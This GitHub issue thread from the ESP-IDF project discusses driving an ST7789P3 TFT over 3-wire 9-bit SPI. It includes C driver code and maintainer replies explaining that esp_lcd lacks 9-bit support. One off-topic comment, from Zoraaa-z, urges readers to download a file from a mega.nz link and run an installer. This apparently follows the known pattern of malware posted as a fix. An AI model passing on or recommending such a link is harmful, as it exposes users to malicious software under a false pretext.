espressif/esp-idf #14439: Does esp_lcd support SPI3WIRE 9BIT to drive TFT?

lbuque, 2024-08-25:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### General issue report

MCU: ESP32-C3
ESP-IDF: master

I see esp_lcd supports SPI3WIRE, but not sure if it supports 9BIT. There is no control of command mode or data mode through the DC line.

This is my initialization code:

```c
    buscfg.sclk_io_num = SCK_PIN;
    buscfg.mosi_io_num = MOSI_PIN;
    buscfg.miso_io_num = MOSI_PIN;
    buscfg.quadwp_io_num = -1;
    buscfg.quadhd_io_num = -1;
    buscfg.max_transfer_sz = 4096;
    buscfg.flags = SPICOMMON_BUSFLAG_DUAL;

    ESP_ERROR_CHECK(spi_bus_initialize(LCD_HOST, &buscfg, SPI_DMA_CH_AUTO));

    esp_lcd_panel_io_handle_t io_handle = NULL;
    esp_lcd_panel_io_spi_config_t io_config;
    memset(&io_config, 0, sizeof(io_config));

    io_config.dc_gpio_num = -1;
    io_config.cs_gpio_num = CS_PIN;
    io_config.pclk_hz = 10 * 1000 * 1000;
    io_config.lcd_cmd_bits = 8;
    io_config.lcd_param_bits = 8;
    io_config.spi_mode = 0;
    io_config.trans_queue_depth = 8;
    io_config.flags.sio_mode = 1;

    // Attach the LCD to the SPI bus
    ESP_ERROR_CHECK(esp_lcd_new_panel_io_spi((esp_lcd_spi_bus_handle_t)LCD_HOST, &io_config, &io_handle));
```

Use esp_lcd_panel_io_tx_param to send the initialization sequence code given to me by the manufacturer. tft is not working properly.

-------------

I use spi driver to drive tft, it can initialize normally.

Below is the code I use to drive the tft using the spi driver.

```c
void SPI_3Wire_Interface_Init()
{
    spi_bus_config_t buscfg;
    memset(&buscfg, 0, sizeof(buscfg));
    buscfg.miso_io_num = -1;
    buscfg.mosi_io_num = MOSI_PIN;
    buscfg.sclk_io_num = SCK_PIN;
    buscfg.quadwp_io_num = -1;
    buscfg.quadhd_io_num = -1;
    buscfg.max_transfer_sz = 4096; //= 4096 Byte
    buscfg.flags = SPICOMMON_BUSFLAG_DUAL;

    spi_device_interface_config_t devcfg;
    memset(&devcfg, 0, sizeof(devcfg));
    devcfg.command_bits = 1;     //D/Cx位，0 cmd， 1 data
    devcfg.mode = 0;   //CPOL, CPHA xSPI_CPOL_CPHA_mode = 0
    devcfg.clock_speed_hz = 4 * 1000 * 1000; //=1MHz
    devcfg.spics_io_num = CS_PIN;
    devcfg.flags = SPI_DEVICE_3WIRE | SPI_DEVICE_HALFDUPLEX; //3线半双工
    devcfg.queue_size = 8;

    //Initialize the SPI bus
    esp_err_t ret = spi_bus_initialize(LCD_HOST, &buscfg, SPI_DMA_CH_AUTO);
    log_i("ret: %d", ret);
    //Attach the LCD to the SPI bus
    ret = spi_bus_add_device(LCD_HOST, &devcfg, &spi);
    log_i("ret: %d", ret);
}

void lcd_write_cmd(const uint8_t cmd)
{
    log_i("lcd_write_cmd");
    spi_transaction_t sendcfg;
    memset(&sendcfg, 0, sizeof(sendcfg));
    sendcfg.cmd = 0;                        //cmd = 0
    sendcfg.length=8;
    sendcfg.tx_buffer = &cmd;
    esp_err_t ret = spi_device_polling_transmit(spi, &sendcfg);
    log_i("s cmd ret: %d", ret);
}

void lcd_write_data(const uint8_t data)
{
    log_i("lcd_write_data");
    spi_transaction_t sendcfg;
    memset(&sendcfg, 0, sizeof(sendcfg));
    sendcfg.cmd = 1;                        //data = 1
    sendcfg.length=8;
    sendcfg.tx_buffer = &data;
    esp_err_t ret = spi_device_polling_transmit(spi, &sendcfg);
    log_i("s data ret: %d", ret);
}
```

Zoraaa-z, 2024-08-25:
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

atanisoft, 2024-08-25:
@lbuque Which TFT are you using? I've not seen any that require 9-bit commands.

lbuque, 2024-08-25:
@atanisoft datasheet: https://www.buydisplay.com/download/ic/ST7789P3.pdf

[image]

This is my code:

https://github.com/lbuque/HardWareTest/blob/master/HardWareTest.ino#L139-L258

atanisoft, 2024-08-25:
your sample code doesn't use esp_lcd APIs from what I can tell. But I believe if you send:
```
io_config.lcd_cmd_bits = 9;
io_config.lcd_param_bits = 9;
```
and pack the 9th bit (D/C in datasheet) it might work. More common though is four wire SPI (CS, CLK, MOSI/DATA, DC) and I've used ST7789V displays with the ESP-IDF APIs quite successfully.

atanisoft, 2024-08-25:
For your current code try:

```
void lcd_write_cmd(const uint8_t cmd)
{
    log_i("lcd_write_cmd");
    spi_transaction_t sendcfg;
    uint16_t data_to_send = cmd;
    memset(&sendcfg, 0, sizeof(sendcfg));
    sendcfg.cmd = 0;
    sendcfg.length=9;
    sendcfg.tx_buffer = &data_to_send;
    esp_err_t ret = spi_device_polling_transmit(spi, &sendcfg);
    log_i("s cmd ret: %d", ret);
}

void lcd_write_data(const uint8_t data)
{
    log_i("lcd_write_data");
    spi_transaction_t sendcfg;
    memset(&sendcfg, 0, sizeof(sendcfg));
    uint16_t data_to_send = data;
    data_to_send |= 0x0100; // set D/C bit high
    sendcfg.cmd = 1;
    sendcfg.length=9;
    sendcfg.tx_buffer = &data_to_send;
    esp_err_t ret = spi_device_polling_transmit(spi, &sendcfg);
    log_i("s data ret: %d", ret);
}
```

I don't know if this will work or not but it might since it is setup to send 9-bit blocks with the D/C bit being set (the bit set may need to be in `lcd_write_cmd` instead of `lcd_write_data` so be sure to test it)

suda-morris, 2024-08-26:
[image]

Each color bytes needs an extra bit to indicates the "D/C" state. I see you set `devcfg.command_bits = 1;` this only works for a single **SPI transaction**, instead of "inserting an extra bit ahead of each data bytes".

So, esp_lcd doesn't support 9-bit SPI LCD. Unless you insert the "DC" value into the data bytes manually (not perfect AFAICT).

lbuque, 2024-08-27:
@atanisoft @suda-morris Thanks! This issue will be closed.

closed 2024-08-27 by lbuque